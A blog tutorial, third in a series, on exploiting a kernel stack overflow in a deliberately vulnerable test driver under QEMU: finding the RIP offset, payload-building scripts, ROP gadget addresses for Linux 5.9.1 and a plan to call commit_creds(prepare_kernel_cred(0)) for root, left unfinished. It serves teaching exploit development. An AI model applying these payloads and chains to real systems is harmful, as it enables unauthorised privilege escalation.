[Linux Kernel Exploitation 0x2] Controlling RIP and Escalating privileges via Stack Overflow

Previous Posts in Series:

  1. [Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html
  2. [Linux Kernel Exploitation 0x1] Smashing Stack Overflows in the Kernel https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x1-smashing.html
  3. this post
Hi folks! I'm back, and this time I've got a banger of a post: we're going to finish off the last part of the exploit chain for stack overflows. In the previous post we discussed some details of memory protections in the kernel and probed a few of the memory structures involved. If you don't know how to debug a Linux kernel, build one, or build a QEMU image, please check out the earlier posts in the series. In this post we're going to start really wielding our power over the stack, crafting ROP chains and calls to some interesting functions.

Controlling RIP (No Canary)

The last time we discussed canaries we turned off CONFIG_STACKPROTECTOR and looked at the stack to confirm there was absolutely no protection. What I did after that, behind the scenes, was check whether VMAP_STACK has any significant impact, because initially my writes were triggering a ton of page faults! After that I made an adjustment to the driver: I changed target_buf to a fixed-size char buffer, "char target[16]". This seemed to make my stack smashing more reliable. So I again implore you to use the target driver for the following set of examples.
First let's find the length at which we start overwriting the return address, the value that ends up in RIP. This is not the best explanation, but to keep things simple my procedure was: increase the write length 1 byte at a time, check the kind of error triggered, and put a taint value like 0x43434343 at the end of the payload to see whether it ends up in any registers or other interesting places when a fault is triggered.
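As a rough sketch of the probing procedure described above, here is how the trial payloads could be generated in Python. The names probe_payload and probe_series are made up for illustration, and the 40 to 48 range is only an example. Delivering each payload to the driver and inspecting the resulting fault in gdb still has to be done by hand.

```python
import struct

# The taint value from the text, packed little-endian: b"CCCC".
TAINT = struct.pack("<I", 0x43434343)


def probe_payload(pad_len):
    """Return pad_len filler bytes followed by the taint marker."""
    return b"A" * pad_len + TAINT


def probe_series(start, stop):
    """Yield (padding length, payload) pairs, growing one byte at a time."""
    for pad_len in range(start, stop + 1):
        yield pad_len, probe_payload(pad_len)


if __name__ == "__main__":
    # Example range only; the right window depends on the driver's stack frame.
    for pad_len, payload in probe_series(40, 48):
        print(pad_len, payload)
```

When the marker shows up in RIP in the fault report, the padding length used for that payload is the offset to the saved return address.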
Eventually this laborious process yielded a length of 48 characters of padding, after which the next bytes of the payload overwrite the RIP value exactly. To demonstrate, check out this nifty screenshot:

GDB output showing that an address from our payload is actually executed in the kernel! We officially control execution woo hoo!

For those who want to recreate this using the stuff I set up for the test, you'll need to fire off this command, making sure your module is loaded and accessible:

./stacksmash_test_addr.sh 48 [address to execute]

If you want to see what ./stacksmash_test_addr.sh does, it's very simple: it takes a payload length and a hexadecimal address as input and spits out a string that we can use as a payload. Here's the code:

# Assumes LENGTH and ADDR hold the script's two arguments (padding length, hex address).
./stacksmash_app.elf `python -c '\
import sys; address=sys.argv[2];
address_string="".join([chr(int(address[2:][i:i+2],16)) for i in range(0,len(address[2:])+2,2) if len(address[2:][i:i+2]) != 0][::-1]);print("A"*int(sys.argv[1])+address_string)' $LENGTH $ADDR` 10

I've tried to clean it up a bit, but honestly all I'm doing here is using some ugly Python to convert a hexadecimal address into a format that ends up in memory properly: it splits the hex string into bytes and reverses them so they land in little-endian order. It's not crucial to understand everything that happens here because there are much less complicated ways to achieve this. I'm just trying to go through it in the most straightforward way possible so everyone can participate without requiring much background in kernel dev.
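For anyone who finds the one-liner hard to read, here is a hedged Python 3 sketch of what it appears to be doing. The helper names hex_to_payload_bytes and build_payload are hypothetical and not part of the test setup.

```python
def hex_to_payload_bytes(hex_addresses):
    """Turn a hex string such as "0xffffffff8124529d" into reversed bytes.

    Reversing the byte order is what makes the address land in memory
    in little-endian form. Raises ValueError on an odd number of digits.
    """
    digits = hex_addresses
    if digits.lower().startswith("0x"):
        digits = digits[2:]
    return bytes.fromhex(digits)[::-1]


def build_payload(pad_len, hex_addresses):
    """Filler bytes up to the saved return address, then the address bytes."""
    return b"A" * pad_len + hex_to_payload_bytes(hex_addresses)


if __name__ == "__main__":
    payload = build_payload(48, "0xffffffff8124529d")
    print(payload.hex())
```

One thing to watch for if you port the script to Python 3: print() would encode bytes above 0x7f as multi-byte UTF-8, so raw payload bytes should be written with sys.stdout.buffer.write() instead.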

In the above screenshot, note that the breakpoint is set on a function unusual enough that hitting it tells us we really are triggering execution, because it may happen that you get all happy about triggering a ROP payload when it's just natural kernel noise, hehe. Congratulations, you just controlled execution at one of the highest privilege levels available to a human being (on a Linux computer)! Fancy stuff! The next step is to start chaining together instructions that achieve a goal we want.

Privilege Escalation for Kernel Intruders

Before we do that let's lay out a game plan. There are any number of things we can do with these newly gained kernel powers, but let's try something simple: get root creds. So what we need to do is get the kernel to make our userland process insta-root! It turns out there are functions in the kernel symbol table that literally do that:
  • prepare_kernel_cred(struct task_struct *daemon) is a function that generates a cred structure. We need this for our call to the next important function. I know it takes a weird task_struct thing, but fret not: the documentation indicates that this can be NULL, which triggers a default that gives us "full creds".
  • commit_creds(struct cred *) does the actual deed and installs the cred structure on our task.
So we need a Return Oriented Programming (ROP) chain that puts together a call like commit_creds(prepare_kernel_cred(0)), which in terms of assembler instructions means we need:
  • an instruction chain that puts a NULL in rdi before we call prepare_kernel_cred. This is because, according to the calling convention, rdi holds the first parameter.
  • an instruction chain that grabs the returned cred structure (which will be a pointer in rax at this point) and sticks it in rdi before our call to commit_creds
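To make the two requirements above concrete, here is a minimal sketch of how the stack slots for such a chain might be laid out. Everything in it is an assumption: the function name build_cred_chain is hypothetical, all four addresses have to be found for your own kernel build, and a clean "pop rdi ; ret" or "mov rdi, rax ; ret" gadget may not exist in a given image.

```python
import struct


def build_cred_chain(pop_rdi_ret, prepare_kernel_cred, mov_rdi_rax_ret, commit_creds):
    """Lay out stack slots for commit_creds(prepare_kernel_cred(0)).

    All four arguments are addresses the reader must supply; none of
    them are taken from the post.
    """
    slots = [
        pop_rdi_ret,          # pop rdi ; ret -> loads the next slot into rdi
        0,                    # rdi = NULL, the argument to prepare_kernel_cred
        prepare_kernel_cred,  # returns the new cred pointer in rax
        mov_rdi_rax_ret,      # mov rdi, rax ; ret -> pass that pointer along
        commit_creds,         # installs the creds on the current task
    ]
    # Each slot is one little-endian 64-bit value, lowest stack address first.
    return b"".join(struct.pack("<Q", slot) for slot in slots)


if __name__ == "__main__":
    # Obviously fake placeholder addresses, for illustration only.
    print(build_cred_chain(0x1111, 0x2222, 0x3333, 0x4444).hex())
```

Note that the NULL slot is eight zero bytes, and NUL bytes cannot pass through a command-line argument, so a chain like this would need a different delivery path than an argv string.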
Beyond this there's also the problem of leaving the realm of the kernel to enjoy your newfound powers in middle earth. Luckily for us there are a couple of methods one can use to leave, each of them requiring something different of the stack and register values.
We'll address this after our ROP chain is almost complete, so in summary, our plan so far is:
  1. RIP Control: Find a write length that controls the RIP
  2. ROP Chain: Build a ROP Chain that calls commit_creds(prepare_kernel_cred(0))
  3. Return2Userland: Exit the kernel safely using iretq, sysexit, etc
Our overall plan will vary slightly depending on the protections in place on the stack; for now let's keep it simple.

Building a ROP chain

We need a tool that will compile a list of ROP-friendly instructions. I relied on ROPgadget.py; it seems to get the job done, although I'm sure there are tons of tools that can handle this. Here's me dumping ROP gadgets for the kernel I'm attacking here (Linux 5.9.1):

Screenshot of some ROPgadget.py output after being run on the vmlinux image for our target kernel.

Okay, so we need to pick up a couple of gadgets. To start, let's set up a little gadget to call any function pointer on the stack. Here are my candidates:
  • 0xffffffff8124529d pop rbx ; ret
  • 0xffffffff8230f2ff call rbx 

Using these gadgets means we want to pop something into rbx, which requires us to have something on the stack for the pop to consume. For us this means packing the address of prepare_kernel_cred into the payload right after the pop rbx gadget, with the call rbx gadget following it.
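Here is a small sketch of that layout using the two candidate gadgets. The address 0xffffffff81088be0 is assumed to be prepare_kernel_cred on this particular build, and the helper names are hypothetical. The last helper produces the hex string in the form ./stacksmash_test_addr.sh expects, which is reversed because the script flips the whole byte string.

```python
import struct

POP_RBX_RET = 0xffffffff8124529d  # pop rbx ; ret (candidate gadget from the list above)
CALL_RBX = 0xffffffff8230f2ff     # call rbx      (candidate gadget from the list above)
# Assumption: this is where prepare_kernel_cred lives on this particular build.
PREPARE_KERNEL_CRED = 0xffffffff81088be0


def call_via_rbx(target):
    """Return the addresses in the order they should sit on the stack."""
    return [POP_RBX_RET, target, CALL_RBX]


def pack_chain(stack_order):
    """Pack each address as a little-endian 64-bit value, first slot first."""
    return b"".join(struct.pack("<Q", addr) for addr in stack_order)


def as_script_argument(stack_order):
    """Hex argument for the script, which reverses the entire byte string."""
    return "0x" + "".join("%016x" % addr for addr in reversed(stack_order))


if __name__ == "__main__":
    chain = call_via_rbx(PREPARE_KERNEL_CRED)
    print(as_script_argument(chain))
    print(pack_chain(chain).hex())
```

Keeping the stack order and the script's argument order as two separate steps makes it harder to mix up which address is consumed first.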


Okay, so we need to somehow use ./stacksmash_test_addr.sh to pack several addresses into the payload. I've tried more sophisticated ways and they are currently failing, so I've decided to stick with this clunky script for now. Because the script reverses the whole byte string, the addresses have to be concatenated in reverse order, with the last stack entry first. Call stacksmash_test_addr.sh as follows:
./stacksmash_test_addr.sh 48 0xffffffff8230f2ffffffffff81088be0ffffffff8124529d
This is going to prove a little tricky because of the default terminal line size on QEMU, which I haven't figured out how to change yet (I'll update this once I do!). Anyway, if you get this right, what should end up on your stack is the following:
Some gdb output confirming we actually are building a sane payload. Here I just grab the address of the buf parameter from a kernel mediated call to vfs_write; this helps me make sure I'm looking at the correct buffer, before the driver touches it.

And if you manage to actually run the sample payload here you should hit breakpoints that indicate you're in control:

That confirms that we are hitting the right notes and we can pretty much call any function now with this neat little gadget! What we need to do now is prepare a ROP chain to stick a NULL in rdi before we make the call to prepare_kernel_cred. Just a note: when choosing gadgets I would prioritize those that cause the least stack drama (some ret instructions take an immediate operand that pops extra bytes off the stack after returning, so watch out) and that affect as few registers as possible. But I suggest just trying stuff; you actually learn a lot from seeing gadgets not work!


I've been stuck at this point for a few weeks, so I'm going to cut my losses with this post and end it here; we'll prepare the rest of the payload in the next post. Enjoy!

Reading and References